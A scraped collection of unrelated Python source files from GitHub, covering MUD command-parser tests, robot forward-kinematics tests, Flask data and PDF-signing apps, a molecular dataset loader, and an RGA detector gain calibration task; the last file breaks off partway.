should match the previously created\n # test command.\n self.assertIs(self.table.lookup_command(parsed), cmd)\n # Now make the input something that definitely isn't in the command\n # table. The return value should be None, meaning no match.\n parsed.command_str = 'invalid'\n self.assertEqual(self.table.lookup_command(parsed), None)\n\n def test_add_duplicate_name(self):\n \"\"\"\n Tries to add a duplicate (name) command.\n \"\"\"\n cmd = BaseCommand()\n cmd.name = 'test'\n self.table.add_command(cmd)\n\n cmd2 = BaseCommand()\n cmd2.name = 'test'\n # This is a duplicate, should raise exception.\n self.assertRaises(DuplicateCommandException, self.table.add_command, cmd2)\n\n def test_add_duplicate_alias(self):\n \"\"\"\n Tries to add a duplicate (alias) command.\n \"\"\"\n cmd = BaseCommand()\n cmd.name = 'cmd'\n cmd.aliases = ['l', 't']\n self.table.add_command(cmd)\n\n cmd2 = BaseCommand()\n cmd2.name = 'cmd2'\n cmd2.aliases = ['g', 't']\n # This is a duplicate, should raise exception.\n self.assertRaises(DuplicateCommandException, self.table.add_command, cmd2)\n\n\nclass CommandParserTests(DottTestCase):\n\n @inlineCallbacks\n def setUp(self):\n yield super(CommandParserTests, self).setUp()\n\n self.parser = CommandParser()\n\n @inlineCallbacks\n def tearDown(self):\n yield super(CommandParserTests, self).tearDown()\n\n del self.parser\n\n def test_simple_command(self):\n \"\"\"\n Parses a simple command with no args.\n \"\"\"\n parsed = self.parser.parse('look')\n self.assertIsInstance(parsed, ParsedCommand)\n self.assertEquals(parsed.command_str, 'look')\n self.assertEquals(parsed.arguments, [])\n self.assertEquals(parsed.switches, set([]))\n\n def test_command_with_arguments(self):\n \"\"\"\n Throw some arguments in as well.\n \"\"\"\n parsed = self.parser.parse('look ship')\n self.assertEquals(parsed.command_str, 'look')\n self.assertEquals(parsed.arguments, ['ship'])\n self.assertEquals(parsed.switches, set([]))\n\n parsed = self.parser.parse('look ship hi')\n self.assertEquals(parsed.arguments, ['ship', 'hi'])\n\n def test_command_with_switches_and_arguments(self):\n \"\"\"\n The whole she-bang.\n \"\"\"\n parsed = self.parser.parse('look/quiet ship')\n self.assertEquals(parsed.command_str, 'look')\n self.assertEquals(parsed.arguments, ['ship'])\n self.assertEquals(parsed.switches, {'quiet'})\n\n def test_poses(self):\n \"\"\"\n Poses have some shortcuts that are handled differently. Test those\n here, for the MUX/MUSH/MOO folks.\n \"\"\"\n parsed = self.parser.parse(':taunts you.')\n self.assertEquals(parsed.command_str, 'emote')\n self.assertEquals(parsed.arguments, ['taunts', 'you.'])\n self.assertEquals(parsed.switches, set([]))\n\n parsed = self.parser.parse(\";'s face is weird.\")\n self.assertEquals(parsed.command_str, 'emote')\n self.assertEquals(parsed.arguments, [\"'s\", 'face', 'is', 'weird.'])\n self.assertEquals(parsed.switches, {'nospace'})","repo_name":"gtaylor/dott","sub_path":"src/daemons/server/commands/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"35"} +{"seq_id":"19221105280","text":"import pandas as pd\n\nfrom powerline.finance.auction import TradingAlgorithmAuction, \\\n BeforeEpexAuction\n\n__author__ = 'Warren'\n\n\nclass TestAuctionAlgorithm(TradingAlgorithmAuction):\n \"\"\"\n This algorithm will send a specified number of orders, to allow unit tests\n to verify the orders sent/received, transactions created, and positions\n at the close of a simulation.\n \"\"\"\n\n def initialize(self,\n sid,\n amount,\n order_count,\n day,\n sid_filter=None,\n slippage=None,\n commission=None):\n self.count = order_count\n self.asset = self.sid(sid)\n self.amount = amount\n self.day = day\n self.incr = 0\n\n self.prog = pd.DataFrame()\n\n if sid_filter:\n self.sid_filter = sid_filter\n else:\n self.sid_filter = [self.asset.sid]\n\n if slippage is not None:\n self.set_slippage(slippage)\n\n if commission is not None:\n self.set_commission(commission)\n\n self.schedule_function(func=self.auction, time_rule=BeforeEpexAuction(\n minutes=30))\n\n def handle_data(self, data):\n pass\n","repo_name":"warren-oneill/powerline","sub_path":"powerline/test_algorithms.py","file_name":"test_algorithms.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"12763340520","text":"import casadi as ca\nimport numpy as np\nimport pytest \n\nfrom forwardkinematics.urdfFks.pandaFk import PandaFk\nfrom forwardkinematics.urdfFks.urdfFk import LinkNotInURDFError\n\n@pytest.fixture\ndef fk():\n return PandaFk()\n\ndef test_pandaFk(fk):\n q_ca = ca.SX.sym(\"q\", 7)\n q_np = np.random.random(7)\n fkCasadi = fk.fk(q_ca, 7, positionOnly=False)\n fkNumpy = fk.fk(q_np, 7, positionOnly=False)\n assert isinstance(fkCasadi, ca.SX)\n assert isinstance(fkNumpy, np.ndarray)\n\ndef test_pandaFkByName(fk):\n q_ca = ca.SX.sym('q', 7)\n q_np = np.random.random(7)\n fkCasadi = fk.fk_by_name(q_ca, 'panda_link3', positionOnly=False)\n assert isinstance(fkCasadi, ca.SX)\n\ndef test_pandafkByWrongName(fk):\n q_ca = ca.SX.sym('q', 7)\n with pytest.raises(LinkNotInURDFError):\n fkCasadi = fk.fk_by_name(q_ca, 'panda_link10', positionOnly=False)\n\ndef test_simpleFk(fk):\n q_np = np.array([0.0000, 1.0323, 0.0000, 0.8247, 0.0000, 0.2076, 0.0000])\n fkNumpy = fk.fk(q_np, 0, positionOnly=True)\n x_ee = np.array([0.0, 0.0, 0.0])\n assert fkNumpy[0] == pytest.approx(x_ee[0], abs=1e-4)\n assert fkNumpy[1] == pytest.approx(x_ee[1], abs=1e-4)\n assert fkNumpy[2] == pytest.approx(x_ee[2], abs=1e-4)\n fkNumpy = fk.fk(q_np, 1, positionOnly=True)\n x_ee = np.array([0.2713, 0.0, 0.4950])\n assert fkNumpy[0] == pytest.approx(x_ee[0], abs=1e-4)\n assert fkNumpy[1] == pytest.approx(x_ee[1], abs=1e-4)\n assert fkNumpy[2] == pytest.approx(x_ee[2], abs=1e-4)\n fkNumpy = fk.fk(q_np, 7, positionOnly=True)\n x_ee = np.array([0.4, 0.0, 0.69])\n assert fkNumpy[0] == pytest.approx(x_ee[0], abs=1e-4)\n assert fkNumpy[1] == pytest.approx(x_ee[1], abs=1e-4)\n assert fkNumpy[2] == pytest.approx(x_ee[2], abs=1e-4)\n","repo_name":"maxspahn/forwardKinematics","sub_path":"tests/test_pandaFk.py","file_name":"test_pandaFk.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"75238882659","text":"import pandas as pd\nfrom flask import Flask, render_template, jsonify, redirect, \\\n request, session, g, url_for, abort\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nimport sqlite3\nimport os\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\n# The database URI\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get('DATABASE_URL', '') or \"sqlite:///biodiversity/db/belly_button_biodiversity.sqlite\"\n\ndb = SQLAlchemy(app)\n\nengine = create_engine(\"sqlite:///biodiversity/db/belly_button_biodiversity.sqlite\")\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\nOtu = Base.classes.otu\nSamples = Base.classes.samples\nSamples_metadata = Base.classes.samples_metadata\n\nsession = Session(bind=engine)\n\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef home():\n \"\"\"Render Home Page.\"\"\"\n return render_template(\"index.html\")\n\n@app.route(\"/names\")\ndef names():\n \"\"\"Return emoji score and emoji char\"\"\"\n\n names = Base.metadata.tables[\"samples\"].columns.keys()[1:]\n return jsonify(names)\n\n@app.route(\"/otu\")\ndef otu():\n\n otus = session.query(Otu.lowest_taxonomic_unit_found).all()\n otus = [otu[0] for otu in otus]\n return jsonify(otus)\n\n@app.route(\"/metadata/\")\ndef metadata(sample):\n target = sample.split(\"_\")[1]\n metadata = session.query(Samples_metadata.AGE, Samples_metadata.BBTYPE, Samples_metadata.ETHNICITY, Samples_metadata.GENDER, Samples_metadata.LOCATION, Samples_metadata.SAMPLEID).filter(Samples_metadata.SAMPLEID == target).all()\n \n metadata_list = {}\n metadata_list[\"AGE\"] = metadata[0][0]\n metadata_list[\"BBTYPE\"] = metadata[0][1]\n metadata_list[\"ETHNICITY\"] = metadata[0][2]\n metadata_list[\"GENDER\"] = metadata[0][3]\n metadata_list[\"LOCATION\"] = metadata[0][4]\n metadata_list[\"SAMPLEID\"] = metadata[0][5]\n\n metadata_list = jsonify(metadata_list)\n\n return metadata_list\n\n@app.route(\"/wfreq/\")\ndef wfreq(sample):\n target = sample.split(\"_\")[1]\n wfreq = session.query(Samples_metadata.WFREQ).filter(Samples_metadata.SAMPLEID == target).all()\n return jsonify(wfreq)\n\n@app.route(\"/samples/\")\ndef samples(sample):\n query = session.query(Samples)\n sample_df = pd.read_sql(query.statement, query.session.bind)\n \n sample_series = sample_df[sample]\n otu_series = sample_df[\"otu_id\"]\n\n df = pd.DataFrame({\"1\": otu_series, \"2\": sample_series})\n df = df.loc[df[\"2\"] != 0].sort_values(by=['2'], ascending=False)\n\n otu_ids = list(map(int, df[\"1\"].values))\n values = list(map(int, df[\"2\"].values))\n \n return jsonify({\"otu_ids\": otu_ids, \"sample_values\": values})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"cherngywh/Interactive-Visualizations-and-Dashboards","sub_path":"biodiversity/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"11871898820","text":"from io_utils import *\nimport json\n\nclass Theme:\n def __init__(self, *args, **kwargs):\n self.id = kwargs.get(\"id\")\n self.name = kwargs.get(\"name\")\n self.language = kwargs.get(\"language\")\n self.stylesheets = kwargs.get(\"stylesheets\")\n self.legal = kwargs.get(\"legal\")\n self.logo = kwargs.get(\"logo\")\n self.css_variables = kwargs.get(\"css_variables\")\n\n @staticmethod\n def parse_theme(filename):\n with open(filename) as fh:\n obj = json.load(fh)\n \n return Theme(\n id = obj['id'],\n name = obj['name'],\n language = obj['language'],\n stylesheets = obj['stylesheets'],\n legal = obj['legal'],\n logo = obj['logo'],\n css_variables = obj['css_variables'],\n )\n @staticmethod\n def load_themes(dir):\n themes = {}\n for file in expand_glob(dir,\"*.theme\"): \n theme = Theme.parse_theme(file)\n themes[theme.id] = theme\n return themes\n\n\n","repo_name":"kwrl/kwrl_build","sub_path":"themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73584181862","text":"import uuid\n\nfrom os.path import basename\nfrom os.path import exists\nfrom os.path import join\n\nfrom flask import Blueprint, request\nfrom flask import current_app\nfrom flask import make_response\nfrom flask import render_template\nfrom pkiexpress import PadesSigner\nfrom pkiexpress import standard_signature_policies\n\nfrom sample.pades_visual_elements_express import PadesVisualElementsExpress\nfrom sample.storage_mock import create_app_data\nfrom sample.storage_mock import get_pdf_stamp_path\nfrom sample.utils import get_expired_page_headers\nfrom sample.utils import set_pki_defaults\n\n# 26-08-2022\n# By further inspecting in the latest Blueprint documentation (https://flask.palletsprojects.com/en/2.2.x/api/#blueprint-objects), \n# when creating a Blueprint object, the first parameter (name) is prepend to the URL endpoint. Therefore, Blueprint no longer \n# allows dots in the name since it would break the URL entirely.\n__name__ = __name__.replace(\".\",\"/\")\nblueprint = Blueprint(basename(__name__), __name__, \n url_prefix='/pades-server-key-express')\n\n\n@blueprint.route('/')\ndef index(file_id):\n \n # Verify if the provided \"file_id\" exists.\n file_path = join(current_app.config['APPDATA_FOLDER'], file_id)\n if not exists(file_path):\n return render_template('error.html', msg='File not found')\n\n # Get an instance of the PadesSigner class, responsible for receiving\n # the signature elements and performing the local signature.\n signer = PadesSigner()\n\n # Set PKI default options (see utils.py).\n set_pki_defaults(signer)\n\n # Set signature policy.\n signer.signature_policy = standard_signature_policies.PADES_BASIC_WITH_LTV\n\n # Set PDF to be signed.\n signer.set_pdf_to_sign_from_path(file_path)\n\n # Set the PKCS #12 certificate path. There is a logic for choosing the generate the PKCS #12\n # from \"issue certificate\" samples or a sample PKCS #12. If no \"certId\" parameter is passed,\n # this example will use a default PFX file \"Pierre de Fermat.pfx\" stored at static/ folder.\n if request.args.get('certId', None) is None:\n # The PKCS #12 certificate path.\n signer.set_pkcs12_from_path(join(current_app.static_folder,\n 'Pierre de Fermat.pfx'))\n # Set the certificate's PIN.\n signer.cert_password = '1234'\n else:\n # Verify if the provided certId refers to an existing certificate file and key.\n cert_id = request.args.get('certId', None)\n if not exists(join(current_app.config['APPDATA_FOLDER'], cert_id)):\n return render_template('error.html', msg='File not found')\n\n # Set generate PKCS #12 and its password\n signer.set_pkcs12_from_path(join(current_app.config['APPDATA_FOLDER'], cert_id))\n signer.cert_password = '1234'\n\n # Set a file reference for the stamp file. Note that this file can be\n # referenced later by \"fref://{alias}\" at the \"url\" field on the visual\n # representation (see content/vr.json or get_visual_representation()\n # method).\n signer.add_file_reference('stamp', get_pdf_stamp_path())\n\n # Set visual representation. We provide a dictionary that represents the\n # visual representation JSON model.\n signer.set_visual_representation(\n PadesVisualElementsExpress.get_visual_representation())\n\n # Generate path for output file and add to signer object.\n create_app_data() # Guarantees that \"app data\" folder exists.\n output_file = '%s.pdf' % (str(uuid.uuid4()))\n signer.output_file = join(current_app.config['APPDATA_FOLDER'], output_file)\n\n # Perform the signature.\n signer_cert = signer.sign(get_cert=True)\n\n response = make_response(render_template(\n 'pades_server_key_express/index.html',\n signer_cert=signer_cert,\n signed_pdf=output_file))\n get_expired_page_headers(response.headers)\n\n return response\n","repo_name":"LacunaSoftware/PkiSuiteSamples","sub_path":"python/flask/sample/views/pades_server_key_express.py","file_name":"pades_server_key_express.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"17280278235","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 6 18:34:22 2019\n\n@author: zl\n\"\"\"\n\nfrom torch.utils.data.dataset import Dataset\nimport ast\nimport os\nimport tqdm\nimport pandas as pd\nimport numpy as np\nimport random\nimport cmath\nimport time\nmax_atom = 29\n\n\n\ndef find_atom_index_dic():\n atom_index_dic_dir = 'data/atom_index_dic.txt'\n if os.path.exists(atom_index_dic_dir):\n with open(atom_index_dic_dir, 'r') as f: \n atom_index_dic = ast.literal_eval(f.read())\n return atom_index_dic\ndef find_type_index_dic():\n type_index_dic_dir = 'data/type_index_dic.txt'\n if os.path.exists(type_index_dic_dir):\n with open(type_index_dic_dir, 'r') as f: \n type_index_dic_dir = ast.literal_eval(f.read())\n return type_index_dic_dir\n \ndef get29f1list():\n r = []\n for i in range(max_atom):\n r.append(-1)\n return r\n \natom_index_dic = {'C': 0, 'H': 1, 'N': 2, 'O': 3, 'F': 4}\ntype_index_dic = find_type_index_dic()\n\ndef get_place_value():\n place_value = [ -1, 100, 100, 100 ]\n type_list = get29f1list()\n for t in type_list:\n place_value.append(t)\n return place_value\n\ndef get_default_info():\n info = []\n for i in range(max_atom ):\n #(x,y,z,atom_index)\n info.append(get_place_value())\n # info = np.array(info)\n # print('info xx ', info.shape)\n # info = info.reshape(max_atom, max_atom, 5)\n return info\ndef save_data_to_local(file, data):\n fileObject = open(file, 'w')\n # for ip in key_group_list:\n fileObject.write(str(data))\n fileObject.write('\\n')\n fileObject.close() \n \ndef changeListFormToRectForm(data_list):\n size = len(data_list)\n result = []\n rlist = []\n for i in range(size):\n rlist.append(i * size + i)\n \n for i in range(size * size):\n if i in rlist:\n num_sqrt = i % size \n result.append(data_list[num_sqrt])\n else:\n result.append(get_place_value())\n \n result = np.array(result)\n \n return result.reshape(size, size, 5)\n \n\n\ndef get_gt_data():\n text_file_gt_all = 'data/gt_data_list.txt'\n if os.path.exists(text_file_gt_all):\n f = open(text_file_gt_all, 'r') \n gt_data_list = ast.literal_eval(f.read())\n f.close() \n return gt_data_list\ndef gen_test_data():\n text_file_test_all = 'data/test_data_list.txt' \n if os.path.exists(text_file_test_all):\n f = open(text_file_test_all, 'r') \n test_data_list = ast.literal_eval(f.read())\n f.close() \n \n return test_data_list \n test_csv_dir = 'data/test.csv'\n df_test = pd.read_csv(test_csv_dir)\n test_data_list = []\n \n pre_mol_name = '' \n molecule_name = ''\n test_data = ''\n for i, row in tqdm.tqdm(df_test.iterrows()):\n molecule_name = row['molecule_name']\n t = row['type']\n t_index = type_index_dic[t]\n # print('molecule_name ', molecule_name)\n if pre_mol_name != molecule_name:\n if i > 0:\n test_data_list.append({'name':pre_mol_name, 'data' : test_data})\n \n test_data = model_info_set[molecule_name]\n pre_mol_name = molecule_name\n index_0 = row['atom_index_0']\n index_1 = row['atom_index_1']\n test_data[index_0][4 + index_1] = t_index\n test_data[index_1][4 + index_0] = t_index\n # print('gt_data ', gt_data)\n # if i > 30 :\n # print('self.train_data_list ', self.train_data_list)\n # break\n test_data_list.append({'name':pre_mol_name, 'data' : test_data})\n save_data_to_local(text_file_test_all, test_data_list)\n return test_data_list\n \ndef gen_train_data():\n text_file_train_all = 'data/train_data_list.txt'; \n text_file_gt_all = 'data/gt_data_list.txt'\n train_data_list = [] \n # if os.path.exists(text_file_train_all):\n # f = open(text_file_train_all, 'r') \n # train_data_list = ast.literal_eval(f.read())\n # f.close() \n \n # return train_data_list\n \n train_csv_dir = 'data/train.csv'\n df_train = pd.read_csv(train_csv_dir)\n train_data_list = []\n gt_data_list = []\n \n pre_mol_name = '' \n molecule_name = ''\n train_data = ''\n gt_data = ''\n # print('model_info_set ', model_info_set)\n for i, row in tqdm.tqdm(df_train.iterrows()):\n molecule_name = row['molecule_name']\n t = row['type']\n t_index = type_index_dic[t]\n # print('molecule_name ', molecule_name)\n if pre_mol_name != molecule_name:\n if i > 0:\n train_data_list.append(train_data)\n gt_data_list.append(gt_data.tolist())\n # print('gt_data save ', gt_data)\n train_data = model_info_set[molecule_name]\n gt_data = np.zeros((max_atom, max_atom ))\n pre_mol_name = molecule_name\n index_0 = row['atom_index_0']\n index_1 = row['atom_index_1']\n train_data[index_0][4 + index_1] = t_index\n train_data[index_1][4 + index_0] = t_index\n scalar_coupling = row['scalar_coupling_constant']\n # print('scalar_coupling ', scalar_coupling)\n # print('int(index_0) ', int(index_0))\n # print('int(index_1) ', int(index_1))\n gt_data[int(index_0)][int(index_1)] = float(scalar_coupling)\n gt_data[int(index_1)][int(index_0)] = float(scalar_coupling)\n # print('gt_data ', gt_data)\n # if i > 30 :\n # print('self.train_data_list ', self.train_data_list)\n # break\n train_data_list.append(train_data)\n #save_data_to_local(text_file_train_all, train_data_list)\n save_data_to_local(text_file_train_all, train_data_list)\n \n gt_data_list.append(gt_data.tolist())\n save_data_to_local(text_file_gt_all, gt_data_list)\n return train_data_list\n \ndef gen_random_index_list():\n txt_random_index_file = 'data/random_index_list.txt'\n if os.path.exists(txt_random_index_file):\n f = open(txt_random_index_file, 'r') \n random_index_list = ast.literal_eval(f.read())\n f.close() \n return random_index_list\n num = len(train_data_list)\n random_index_list = list(range(num))\n random.shuffle(random_index_list)\n save_data_to_local(txt_random_index_file, random_index_list)\n return random_index_list\n\ndef gen_stuc_set_list():\n \n txt_file = [ 'data/model_info_set_0.txt', 'data/model_info_set_1.txt']\n model_info_set = []\n # for path in txt_file:\n # if os.path.exists(path):\n # f = open(path, 'r') \n # model_info_set.extend( ast.literal_eval(f.read()))\n # f.close() \n # return model_info_set\n \n struc_csv_dir = 'data/structures.csv'\n df_struc = pd.read_csv(struc_csv_dir)\n \n model_info_set = {}\n model_info = []\n pre_mol_name = '' \n molecule_name = ''\n for i, row in tqdm.tqdm(df_struc.iterrows()):\n molecule_name = row['molecule_name']\n # print('molecule_name ', molecule_name)\n if pre_mol_name != molecule_name:\n if i > 0:\n # print('molecule_name s ', pre_mol_name)\n model_info_set[pre_mol_name] = model_info\n # print('model_info ', model_info)\n #开始一个新modedel\n model_info = get_default_info()\n pre_mol_name = molecule_name\n \n atom_index = int( row['atom_index'])\n atom = row['atom']\n x = row['x']\n y = row['y']\n z = row['z']\n # print('ai ', atom_index, 'a ', atom, ' x ', x, ' y ', y, ' z ', z)\n model_info[atom_index][0] = atom_index_dic[atom]\n model_info[atom_index][1] = x\n model_info[atom_index][2] = y\n model_info[atom_index][3] = z\n # if i > 20:\n # break\n model_info_set[molecule_name] = model_info\n \n # np2 = int(len())\n # for i, path in enumerate(txt_file):\n # save_data_to_local(path, model_info_set)\n return model_info_set\n\nprint('**DefaultDataset ')\nmodel_info_set = gen_stuc_set_list()\nprint('self.gen_stuc_set_list()')\n\ntrain_data_list = gen_train_data()\nprint('self.gen_train_data()')\n\ngt_data_list = get_gt_data()\nprint('self.get_gt_data()') \n\n \nrandom_index_list = gen_random_index_list()\n \nprint('self.gen_random_index_list ') \ntest_data_list = gen_test_data()\n\nclass TestDataset(Dataset):\n def __init__(self\n ):\n self.data_list = []\n self.name_list = []\n for i in range( len(test_data_list)):\n data_con = test_data_list[i]\n print('data_con ', data_con)\n d_p = data_con['data']\n \n self.data_list.append(d_p)\n self.name_list.append(test_data_list[i]['name'])\n self.data_list = np.array(self.data_list)\n tshape = self.data_list.shape\n self.data_list = self.data_list.reshape(tshape[0],tshape[2], tshape[1])\n self.data_list = self.data_list[:,:,np.newaxis]\n \n def __getitem__(self, index):\n \n return { 'data': self.data_list[index], 'name' : self.name_list[index]}\n \n \n def __len__(self):\n return len( self.data_list) \n\nclass DefaultDataset(Dataset):\n def __init__(self,split\n ):\n \n self.split = split\n self.data_list = []\n self.gt_list = []\n n7 = int (len(random_index_list) * 0.7)\n print('enter DefaultDataset ', random_index_list)\n if split == 'train':\n \n for i in random_index_list[ : n7]:\n d_p = train_data_list[random_index_list[i]]\n # if i == 0:\n # print('d_p ', d_p)\n self.data_list.append(d_p)\n self.gt_list.append(gt_data_list[random_index_list[i]])\n self.tr_data_list = np.array(self.data_list)\n tshape = self.tr_data_list.shape\n print('self.data_list ', tshape)\n self.tr_data_list = self.tr_data_list.reshape(tshape[0],tshape[2], tshape[1])\n print('self.data_list2 ', self.tr_data_list.shape)\n self.tr_data_list = self.tr_data_list[:,:,np.newaxis]\n print('self.data_list3 ', self.tr_data_list.shape)\n self.gt_list = np.array(self.gt_list)\n print('self.gt_list ', self.gt_list.shape)\n \n if split == 'val':\n self.val_data_list = []\n for i in random_index_list[n7 : ]:\n self.val_data_list.append(train_data_list[random_index_list[i]])\n self.gt_list.append(gt_data_list[random_index_list[i]])\n self.val_data_list = np.array(self.val_data_list)\n tshape = self.val_data_list.shape\n print('self.data_list ', tshape)\n self.val_data_list = self.val_data_list.reshape(tshape[0],tshape[2], tshape[1])\n self.val_data_list = self.val_data_list[:,:,np.newaxis]\n print('self.data_list2 ', self.val_data_list.shape)\n self.val_data_list = np.array(self.val_data_list)\n self.gt_list = np.array(self.gt_list)\n print('self.gt_list ', self.gt_list.shape)\n def setSplit(self, split):\n self.split = split\n def __getitem__(self, index):\n # if index % 10 == 0:\n # print('index ', index)\n if self.split == 'train':\n return {'data': self.tr_data_list[index],\n 'gt': self.gt_list[index]\n } \n else :\n return {'data': self.val_data_list[index],\n 'gt': self.gt_list[index]} \n \n def __len__(self):\n return len( self.gt_list) \ndef main():\n data_set = DefaultDataset()\n # print('train_data_list ', data_set.train_data_list)\n # print('gt_data_list ', data_set.gt_data_list)\n\n \nif __name__ == '__main__':\n main()","repo_name":"rosaann/scalar_c","sub_path":"dataset/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":12556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43705231","text":"import sys\nimport math\nimport time\nimport math\nimport numpy as np\n\nfrom srsgui import Task\nfrom srsgui import IntegerInput, InstrumentInput\n\n# get_rga is imported from the path relative to the .taskconfig file\nfrom instruments import get_rga\n\n\nclass CEMGainTask(Task):\n \"\"\"Task to measure CEM gain at different CEM voltage\n \"\"\"\n\n InstrumentName = 'instrument to control'\n GainToSet = 'gain to set'\n MassToMeasure = 'mass to measure'\n StartVoltage = 'start cem voltage'\n StopVoltage = 'stop cem voltage'\n StepVoltage = 'step size'\n ScanSpeed = 'scan speed'\n\n WaitTime = 'wait time'\n Notes = 'notes'\n\n # input_parameters values can be changed interactively from GUI\n input_parameters = {\n InstrumentName: InstrumentInput(),\n GainToSet: IntegerInput(1000, \" \", 100, 1000000, 100),\n MassToMeasure: IntegerInput(28, \" AMU\", 1, 320, 1),\n ScanSpeed: IntegerInput(3, \" \", 0, 7, 1),\n WaitTime: IntegerInput(2, \" s\", 1, 100, 1),\n }\n\n def setup(self):\n self.logger = self.get_logger(__name__)\n\n self.data_dict['x'] = []\n self.data_dict['y'] = []\n\n self.data_dict['t'] = [] # time\n self.data_dict['i'] = [] # intensity\n\n # Get value to use for test from input_parameters\n self.params = self.get_all_input_parameters()\n self.mass_to_measure_value = self.get_input_parameter(self.MassToMeasure)\n self.wait_time_value = self.get_input_parameter(self.WaitTime)\n\n # minimum Faraday cup ion current to run calibration\n self.minimum_intensity = 200.0 # fA\n\n self.start_voltage_value = 800\n self.stop_voltage_value = 2000\n self.step_voltage_value = 160\n\n self.init_plot()\n self.init_rga()\n\n def init_plot(self):\n self.ax1 = self.figure.add_subplot(121)\n self.ax1.set_title(self.__class__.__name__)\n self.ax1.set_xlabel(\"CEM HV (V)\")\n self.ax1.set_ylabel('Gain')\n\n self.line1, = self.ax1.plot(self.data_dict['x'], self.data_dict['y'])\n self.ax1.set_xlim(self.start_voltage_value, self.stop_voltage_value, auto=False)\n self.ax1.set_ylim(1, 100000, auto=False)\n self.ax1.set_yscale('log')\n\n self.ax2 = self.figure.add_subplot(122)\n self.ax2.set_title('Ion current measurement')\n self.ax2.set_xlabel(\"Time (s)\")\n self.ax2.set_ylabel('Intensity (0.1fA)')\n self.line2, = self.ax2.plot(self.data_dict['t'], self.data_dict['i'])\n self.ax2.set_xlim(0, self.wait_time_value * 1.2)\n self.ax2.set_ylim(10, 1e9)\n self.ax2.set_yscale('log')\n\n def init_rga(self):\n self.rga = get_rga(self, self.params[self.InstrumentName])\n print(self.rga.status.id_string)\n self.id_string = self.rga.status.id_string\n self.old_speed = self.rga.scan.speed\n self.old_hv = self.rga.cem.voltage\n\n def test(self):\n self.rga.scan.speed = self.params[self.ScanSpeed]\n self.rga.cem.voltage = 0\n\n # Measure Faraday cup ion current as a reference\n rep = 4\n total = self.measure_intensity_with_delay(self.params[self.WaitTime])\n for i in range(rep):\n total += self.measure_intensity_with_delay(0.0)\n fc_intensity = total / (rep + 1)\n\n if fc_intensity < self.minimum_intensity: # if smaller than minimum_intensity\n raise ValueError('FC reading {:.2f} fA is smaller than {} fA. Need more intensity to calibrate'.format(\n fc_intensity, self.minimum_intensity))\n\n self.logger.info('FC reading is {:.2f} fA at {} AMU and NF= {}'.format(\n fc_intensity, self.mass_to_measure_value, self.params[self.ScanSpeed]\n ))\n\n # Create a table to save data\n table_name = 'Gain vs. HV'\n self.create_table(table_name, 'CEM HV (V)', 'Gain')\n\n # Loop to measure CEM gains\n current_voltage = self.start_voltage_value\n gain = 0\n while (current_voltage <= self.stop_voltage_value) and \\\n (gain < self.params[self.GainToSet]):\n if not self.is_running():\n break\n start_time = time.time()\n elapsed_time = 0\n self.data_dict['t'] = []\n self.data_dict['i'] = []\n self.notify_data_available(self.data_dict)\n\n self.rga.cem.voltage = current_voltage\n\n while elapsed_time <= self.params[self.WaitTime]:\n elapsed_time = time.time() - start_time\n intensity = self.rga.scan.get_single_mass_scan(self.mass_to_measure_value) / 10.0\n self.data_dict['t'].append(elapsed_time)\n self.data_dict['i'].append(intensity)\n self.notify_data_available(self.data_dict)\n\n gain = self.data_dict['i'][-1] / fc_intensity\n gain_ratio = self.params[self.GainToSet] / gain\n\n self.data_dict['x'].append(current_voltage)\n self.data_dict['y'].append(gain)\n\n self.notify_data_available(self.data_dict)\n\n self.add_data_to_table(table_name, round(current_voltage, 0), round(gain, 1))\n self.logger.info(f'CEM voltage: {current_voltage} Gain: {gain:.1f} Gain ratio: {gain_ratio:.1f}')\n\n # Calculate the next CEM voltage\n if gain_ratio > 20 or gain < 0:\n voltage_ratio = 1.16\n elif gain_ratio > 5:\n voltage_ratio = 1.08\n elif gain_ratio > 2.5:\n voltage_ratio = 1.04\n else:\n voltage_ratio = 1.02\n current_voltage = int(current_voltage * voltage_ratio)\n\n # Interpolate the CEM voltage from of measured data\n log_gain = math.log10(self.params[self.GainToSet])\n self.data_dict['log_y'] = [math.log10(a) if a > 0 else 0.001 for a in self.data_dict['y']]\n hv_to_set = int(np.interp(log_gain, self.data_dict['log_y'], self.data_dict['x']))\n self.logger.info(f'HV for gain {self.params[self.GainToSet]} : {hv_to_set:.0f}')\n\n # Measure the gain at the calculated CEM voltage\n measured_gain = self.measure_gain_at_voltage(hv_to_set)\n self.logger.info(f'Measured gain at HV {hv_to_set:.0f} V : {measured_gain:.0f}')\n\n # If the gain error is larger than 10 %, set it to fail\n error = abs(measured_gain - self.params[self.GainToSet]) / self.params[self.GainToSet]\n if error <= 0.10:\n self.rga.cem.voltage = hv_to_set\n self.rga.cem.stored_gain = round(measured_gain, 1)\n self.rga.cem.stored_voltage = round(hv_to_set)\n self.set_task_passed(True)\n self.add_details(f'Gain at {hv_to_set:.0f} V : {measured_gain:.0f}')\n else:\n self.set_task_passed(False)\n\n def update(self, data_dict):\n \"\"\"\n Override 